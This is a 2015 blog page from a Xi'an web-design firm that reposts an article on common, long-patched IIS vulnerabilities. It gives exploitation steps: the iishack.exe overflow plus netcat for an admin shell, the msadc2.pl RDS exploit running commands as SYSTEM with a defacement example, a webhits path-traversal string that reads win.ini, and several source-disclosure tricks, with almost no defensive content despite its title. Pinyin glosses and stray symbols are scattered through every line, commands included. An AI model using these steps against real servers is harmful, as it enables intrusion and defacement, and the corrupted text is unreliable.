西(xī)安網站(zhàn)建設 | 西(xī)安網站(zhàn)制(zhì)作(zuò) | 西(xī)安網站(zhàn)設計(jì) | 西(≤xī)安小(xiǎo)程序開(kāi)發 | 兄弟(dì)網絡 - 西(xī)安網站(zhàn)建設十餘年(nián)經驗,值得(de)信賴!
了(le)解市(shì)場(chǎng)新觀點,內(nèi)部案例剖析,增強服務意識與專業(yè)水(shuβǐ)平。

iis常見(jiàn)漏洞及防範措施(一(yī))

來(lái)源:西(xī)安網站(zhàn)制(zhì)作(zuò)   日(rì)期:2015-05-27 09:21:36   點擊:4059

1. iis4hack緩沖溢出 
     主要(yào)存在于.htr,.idc和(hé).stm文(wén)件(jiàn≠)中,其對(duì)關于這(zhè)些(xiē)文(wén)件(jiàn)的(de)URL請(qǐng)求沒有(y↔ǒu)對(duì)名字進行(xíng)充分(fēn)的(de)邊界檢查,導緻運行(xíng)攻擊者插入一(yī)些(→xiē)後門(mén)程序  在系統中下(xià)載和(hé)執行(xíng)程序。要(yào)檢測這(zhè)樣的(de)站($zhàn)點你(nǐ)需要(yào)兩個(gè)文(wén)件(jiàn)iishack.exe,ncx.exe,你(nǐε)可(kě)以到(dào)下(xià)面 的(de)站(zhàn)點去(qù)下(xià)載,另外(wài)你(nǐ)還(hái)需要(yào)一(φyī)台自(zì)己的(de)WEB服務器(qì)。你(nǐ)現(xiàn)在你(nǐ)自(zì)己的(de)WEB服務器(qì)上(shàng)運§行(xíng)WEB服務程序并把ncx.exe放(fàng)到(dào)你(nǐ)自(zì)己相(xiàng)應的€(de)目錄下(xià),然後使用(yòng)iishack.exe來(lái)檢查目标機(jī)器(qì): 
         ←       
 c:>iishack.exe80/ncx.exe 
                &nb¶sp;
然後你(nǐ)就(jiù)使用(yòng)netcat來(lái)連接你(nǐ)要(yào)檢測的(de)服務器(qì): 
                ♥ 
c:>nc80 
 如(rú)果溢出點正确你(nǐ)就(jiù)可(kě)以看(kàn)到(dào)目标機(jī)器(qì)的(de)命令行(xíng)提示,并且是(shì)管理(lǐ)遠(yuπǎn)權限。利用(yòng)程序見(jiàn)iis4hack.zip 
              & nbsp; 
 2.msadc 
     IIS的(de)MDAC組件(jiàn)存在一(yī)個(gè)漏洞可(kπě)以導緻攻擊者遠(yuǎn)程執行(xíng)你(nǐ)系統的(de)命令。主要(yào)核心問(wèn)題是(shì)存在于RDS Dat™afactory,默認情況下(xià), 它允許遠(yuǎn)程命令發送到(dào)IIS服務器(qì)中,這(zhè)命令↕會(huì)以設備用(yòng)戶的(de)身(shēn)份運行(xíng),其一(yī)般默認情況下(xià)是(shì)SYSTEM用(yòng)戶。利用(yòng)程序為(wèi)msa€dc2.pl,我們看(kàn)看(kàn)它的(de)help 
        &n£bsp;         [quack@chat quack]$ perl msadc2.pl -h ";
               &n≥bsp;  -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- 
        &nγbsp;         Usage: msadc.pl€ -h{ -d-X -v } 
              & nbsp;   -h= host you want to scan (ip or domain) 
           &n"bsp;      -d= delay between calls, default ♣1 second 
         &n bsp;        -X = dump Index Server path δtable, if available 
              &nb→sp;   -N = query VbBusObj for NetBIOS name 
            &nb•sp;     -V = use VbBusObj insteadσ of ActiveDataFactory 
                &∑nbsp; -v = verbose 
        &n≈bsp;       &nbs‍p; -e = external dictionary file for step 5 
              ≈    -u <\hostsharefile> = use UNC file&n"bsp;
         & nbsp;        -w = Windows 95 instead o☆f Windows NT 
             £     -c = v1 compatibility (three step query) 
               &nb®sp;  -s= run only step 
           ↔;       Or a -R will re★sume a (v2) command session 
            &n∞bsp;     [quack@chat quack]$ perl msadc2.pl≈ -hhttp://www.targe.com/ 
              &nb↔sp;   -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- £
             ¥     Type the command line you want to run (cmd /c assumed):&n☆bsp;
              &nb sp;   cmd /c 
               &nbs↑p;  如(rú)果出現(xiàn)cmd /c後,直接鍵入命令行(xíng),就(jiù)可(kě)以以system權限執行(<xíng)命令了(le)。比如(rú)xundi教的(de): 
             ≈     echo hacked by me > d:inetpubwwwrootvictimwe&bindex.htm 
            ↔    
 3.Codebrws.asp 
                ₹;  察看(kàn)文(wén)件(jiàn)源代碼  
          ♣                &∑nbsp;      
  4.Showcode.asp 
             ✔     察看(kàn)文(wén)件(jiàn)源代碼  
        &nbs p;             &nbs♦p;      
   5.Null.htw 
         &nb↑sp;        察看(kàn)文(wén)件(jiàn)源代碼  
            &≈nbsp;           ★          
 6.webhits.dll & .htw 
   hit-highligting功能(néng)是(shì)由Index S™erver提供的(de)允許一(yī)個(gè)WEB用(yòng)戶在文(wén)檔上(shàng)highlighted(突出)他(tā)們原始搜索的(de)條目 ,這(zhè)個(gè)文(wén)檔的(de)名字通(tōng)過變量CiWebhitsfile傳遞給.htw文(wén)件(jiàn),Webhits.dll是(shì)一(yī)個(gè↔)ISAPI應用(yòng)程序 來(lái)處理(lǐ)請(qǐng)求,打開(kāi)文(wén)件(jiàn)并返回結果,當用(yòng)戶控制(zhì)了(le)×CiWebhitsfile參數(shù)傳遞給.htw時(shí),他(tā)們就(jiù)可(kě)以請(qǐng)求任意文(w<én)件(jiàn),結果就(jiù)是(shì)導緻查看(kàn)ASP源碼和(hé)其他(tā)腳本文(wén)件(jλiàn)內(nèi)容。要(yào)了(le)解你(nǐ)是(shì)否存在這(zhè)個(gè)漏洞,你(nǐ)可(kě)以請™(qǐng)求如(rú)下(xià)條目:  
          &nbsφp;     
如(rú)果你(nǐ)從(cóng)服務器(qì)端獲得(de)如(rú)下(xià)信息: ≤;
              &nbs&p; 
 format of the QUERY_STRING is invalid這(zhè)就(≤jiù)表示你(nǐ)存在這(zhè)個(gè)漏洞 .這(zhè)個(gè)問(wèn)題主要(yào)<就(jiù)是(shì)webhits.dll關聯了(le).htw文(wén)件(jiàn)的(de)映射,所以你(nǐ)隻要(yào)取消✔ 
這(zhè)個(gè)映射就(jiù)能(néng)避免這(zhè)個(gè)漏洞,你(nǐ)可(kě)以在你(nǐ)認為(wèi♥)有(yǒu)漏洞的(de)系統中搜索.htw文(wén)件(jiàn),一(yī)般會(huì)發現(xiàn)如≈(rú)下(xià)的(de)程序: 
 /iissamples/issamples/oop/qfullhit.htw 
/iissamples/issamples/oop/qsumrhit.htw 
 /isssamples/exair/search/qfullhit.htw 
/isssamples/exair/search/qsumrhit.htw 
/isshelp/iss/misc/iirturnh.htw (這(zhè)個(gè)一(yī)般為(wèi)loopbacεk使用(yòng)) 
一(yī)個(gè)攻擊者可(kě)以使用(yòng)如(rú)下(xià)的(de)方法來(lái)訪問(wèn)系統中文(wén)件(jiàn)的(de)內(nèi)容:   ;
       ciwebhitsfile=/../../winnt/win.ini&cirestriction=≤none&cihilitetype=full 

就(jiù)會(huì)在有(yǒu)此漏洞系統中win.ini文(wén)件(jiàn)的(de)內(nèi)容。↔ 7.ASP Alternate Data Streams(::$DATA)  要(yào)查看(kàn)一(y✔ī)些(xiē).asp文(wén)件(jiàn)的(de)內(nèi)容,你(nǐ)可(kě)以請(qǐng)求如(rú)下(xià)的(de)≈URL:  你(nǐ)就(jiù)得(de)到(dào)了(le)源代碼 
         &>nbsp;       
8.ASP Dot Bug 
    在請(qǐng)求的(de)URL結尾追加一(yī)個(gè)或者多(duō)個(gè)點導緻洩露ASP源代碼。&nβbsp; 
     
             ☆    
 9.ISM.DLL 
     這(zhè)個(gè)漏洞是(shì)由Cerberus Information Security tea✘m.最早發現(xiàn)的(de),它運行(xíng)在IIS4.0和(hé)5.0上(shàng)面,允許攻擊者查看(kàn)任意文(wén)件(jiàn)內≈(nèi)容和(hé)源代碼。通(tōng)過在文(wén)件(jiàn)名後面追加近(jìn)230個(gè)+或者?%™20?(這(zhè)些(xiē)表示空(kōng)格)并追加?.htr?的(de)特殊請(qǐng)求給IIS,會(huì≥)使IIS認為(wèi)客戶端請(qǐng)求的(de)是(shì)?.htr?文(wén)件(jiàn),而.htr文(wén)件(ji>àn)的(de)後綴映射到(dào)ISM.DLL ISAPI應用(yòng)程序,這(zhè)樣IIS就(jiù)把這(zhè)個(gè≈).htr請(qǐng)求轉交給這(zhè)個(gè)DLL文(wén)件(jiàn),然後ISM.DLL 程序把傳遞過來(lái)的(de)文(wén)件(jiàn∞)打開(kāi)和(hé)執行(xíng),但(dàn)在ISM.DLL 截斷信息之前,緩沖區(qū)發 送 一(yī)個(gè)截斷開(kāi)的(de) .Htr 并會(huì)有(yǒu)一(yī)些(xiē)時(sh í)間(jiān)去(qù)返回一(yī)些(xiē)你(nǐ)要(yào)打開(kāi)的(de)文(wén)件(jiàn)內(nèi)容.≈ 除非 WEB 服務停止并重啓過,否則這(zhè)攻擊隻能(néng)有(yǒu)效執行(xíng)一(yī)次。如(rú)果已經發送過一(yī)個(gè) .h tr 請(qǐng)求到(dào)機(jī)器(qì)上(shàng),那(nà)麽這(zhè)攻擊會(huì)失效.它隻能(néng)在 ISM.DLL第一(yī)次裝入內(n↑èi)存時(shí)工(gōng)作(zuò).CNNS發現(xiàn)追加+号到(dào)沒有(yǒu)一(yī)次≤攻擊這(zhè)個(gè)問(wèn)題,可(kě)以進行(xíng)多(duō)次攻擊。  

上(shàng)一(yī)篇:網頁安全技(jì)術(shù)指南(nán)(二)     下(xià)一(yī)篇:iis常見(jiàn)漏洞及防範措施(二)
掃碼立即溝通(tōng)
公衆号加關注
版權所有(yǒu):西安兄弟信息科技有限公司 京ICP證000000号   地(dì)址:西(xī)安市(shì)三橋街(jiē)道(dào)恒大(dà)都(dōu)市(shì)廣場(chǎng)(1号線沣東(dōng)自(zì)貿園↓站(zhàn)C1口)  營業(yè)執照(zhào)      
關閉
029-86512630 工(gōng)作(zuò):8:30-17:30

*